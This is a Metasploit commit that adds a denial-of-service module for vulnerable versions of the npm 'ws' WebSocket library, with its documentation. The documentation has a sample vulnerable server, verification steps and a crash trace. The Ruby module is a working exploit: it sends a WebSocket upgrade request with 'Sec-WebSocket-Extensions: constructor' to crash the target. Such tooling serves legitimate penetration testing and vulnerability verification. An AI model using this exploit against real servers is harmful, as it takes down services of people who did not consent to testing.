Land rapid7#9283, Add node.js ws websocket library DoS module

busterb · busterb · commit a8b845fff9a1 · 2017-12-20T14:20:42.000-06:00
diff --git a/documentation/modules/auxiliary/dos/http/ws_dos.md b/documentation/modules/auxiliary/dos/http/ws_dos.md
@@ -0,0 +1,57 @@
+## Vulnerable Application
+ws < 1.1.5 || (2.0.0 , 3.3.1)
+https://nodesecurity.io/advisories/550
+
+## Vulnerable Analysis
+This module exploits a Denial of Service vulnerability in npm module "ws".
+By sending a specially crafted value of the Sec-WebSocket-Extensions header 
+on the initial WebSocket upgrade request, the ws component will crash.
+
+## Verification Steps
+1. Start the vulnerable server using the sample server code below `node server.js`
+2. Start `msfconsole`
+3. `use auxiliary/dos/http/ws_dos`
+4. `set RHOST <IP>`
+5. `run`
+6. The server should crash
+
+## Options
+None.
+
+## Scenarios
+
+## Server output from crash
+```
+/Users/sonatype/Downloads/node_modules/ws/lib/Extensions.js:40
+    paramsList.push(parsedParams);
+               ^
+
+TypeError: paramsList.push is not a function
+    at value.split.forEach (/Users/sonatype/Downloads/node_modules/ws/lib/Extensions.js:40:16)
+    at Array.forEach (<anonymous>)
+    at Object.parse (/Users/sonatype/Downloads/node_modules/ws/lib/Extensions.js:15:20)
+    at WebSocketServer.completeUpgrade (/Users/sonatype/Downloads/node_modules/ws/lib/WebSocketServer.js:230:30)
+    at WebSocketServer.handleUpgrade (/Users/sonatype/Downloads/node_modules/ws/lib/WebSocketServer.js:197:10)
+    at Server.WebSocketServer._ultron.on (/Users/sonatype/Downloads/node_modules/ws/lib/WebSocketServer.js:87:14)
+    at emitThree (events.js:136:13)
+    at Server.emit (events.js:217:7)
+    at onParserExecuteCommon (_http_server.js:495:14)
+    at onParserExecute (_http_server.js:450:3)
+```
+
+## Sample server
+```
+const WebSocket = require('ws');
+const wss = new WebSocket.Server(
+{ port: 3000 }
+);
+wss.on('connection', function connection(ws) {
+console.log('connected');
+ws.on('message', function incoming(message)
+{ console.log('received: %s', message); }
+);
+ws.on('error', function (err)
+{ console.error(err); }
+);
+});
+```
diff --git a/modules/auxiliary/dos/http/ws_dos.rb b/modules/auxiliary/dos/http/ws_dos.rb
@@ -0,0 +1,72 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Auxiliary::Dos
+
+  def initialize
+    super(
+      'Name'           => 'ws - Denial of Service',
+      'Description'    => %q{
+          This module exploits a Denial of Service vulnerability in npm module "ws".
+        By sending a specially crafted value of the Sec-WebSocket-Extensions header on the initial WebSocket upgrade request, the ws component will crash.
+      },
+      'References'     =>
+        [
+          ['URL', 'https://nodesecurity.io/advisories/550'],
+          ['CWE', '400'],
+        ],
+      'Author'         =>
+        [
+          'Ryan Knell,  Sonatype Security Research',
+          'Nick Starke, Sonatype Security Research',
+        ],
+      'License'        =>  MSF_LICENSE
+    )
+
+    register_options([
+      Opt::RPORT(3000),
+      OptString.new('TARGETURI', [true, 'The base path', '/']),
+    ],)
+  end
+
+  def run
+    path = datastore['TARGETURI']
+
+    #Create HTTP request
+    req = [
+      "GET #{path} HTTP/1.1",
+      "Connection: Upgrade",
+      "Sec-WebSocket-Key: #{Rex::Text.rand_text_alpha(rand(10) + 5).to_s}",
+      "Sec-WebSocket-Version: 8",
+      "Sec-WebSocket-Extensions: constructor",  #Adding "constructor" as the value for this header causes the DoS
+      "Upgrade: websocket",
+      "\r\n"
+      ].join("\r\n");
+
+    begin
+      connect
+      print_status("Sending DoS packet to #{peer}")
+      sock.put(req)
+
+      data = sock.get_once(-1)  #Attempt to retrieve data from the socket
+
+      if data =~ /101/   #This is the expected HTTP status code. IF it's present, we have a valid upgrade response.
+        print_error("WebSocket Upgrade request Successful, service not vulnerable.")
+      else
+        fail_with(Failure::Unknown, "An unknown error occured")
+      end
+
+      disconnect
+      print_error("DoS packet unsuccessful")
+
+    rescue ::Rex::ConnectionRefused
+      print_error("Unable to connect to #{peer}")
+    rescue ::Errno::ECONNRESET, ::EOFError
+      print_good("DoS packet successful. #{peer} not responding.")
+    end
+  end
+end
